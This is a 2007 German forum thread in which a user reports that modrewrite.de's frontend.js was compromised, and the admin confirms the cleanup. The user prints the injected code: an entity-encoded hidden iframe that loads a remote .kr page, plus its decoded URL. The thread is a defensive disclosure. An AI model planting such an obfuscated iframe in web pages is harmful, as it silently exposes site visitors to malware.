!ACHTUNG! www.modrewrite.de wurde "gehackt"

Haargel leer? Neue Freundin? Stromausfall? Teeladen überfallen? Server abgestürzt? Treppenhaus frisch gestrichen? Bus verpasst? Neuer Fernseher? Alles was niemanden interessiert, aber trotzdem irgendwie raus muss kannst Du hier loswerden...

Moderator: Super-Mod

!ACHTUNG! www.modrewrite.de wurde "gehackt"

Beitragvon morestyle » 01.03.2007 21:41

Hallo,

mein Virusprogramm hat vorhin gemeldet, dass von der Hauptseite aus Viren eingeschleust wurden.
Ich hab dann einfach mal die Datei frontend.js geprüft, da ich auf der Hauptseite nicht finde konnte.
Ja und siehe da, es wurde ein Code- Schnipsel in die JS geschleust:

Code: Alles auswählen
document.write('<iframe src="&#104&#116&#116&#112&#58&#47&#47&#120&#45&#114&#111&#97&#100&#46&#99&#111&#46&#107&#114&#47&#114&#105&#99&#104&#47&#111&#117&#116&#46&#112&#104&#112" width=1 frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 scrolling=no width=0 height=0></iframe>');


Entschlüsselt ists diese Seite:
x-road.co.kr/rich/out.php


Hoffe das kam noch rechtzeitig.


Viele Grüße,
Robert
morestyle
.
.
 
Beiträge: 7
Registriert: 02.12.2004 21:04

Beitragvon Gumbo » 03.03.2007 10:47

Danke für diesen Hinweis, Robert. Ich werde ihn schnell weiterleiten.
Markus Wulftange
Gumbo
Moderator
Moderator
 
Beiträge: 5019
Registriert: 07.01.2005 01:18
Wohnort: Trier

Beitragvon bruno » 03.03.2007 18:22

hallo an alle,
frontend.js bereinigt.
das forum neu aufgesetzt - damit sollte sich das problem erledigt haben.
danke an robert für den hinweis! (wenn dein virenkiller noch anspringt sag bescheid)

gruß
bruno
bruno
Admin
Admin
 
Beiträge: 198
Registriert: 24.05.2004 14:44
Wohnort: nähe Nürnberg


Zurück zu Talk Talk Talk

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 0 Gäste

cron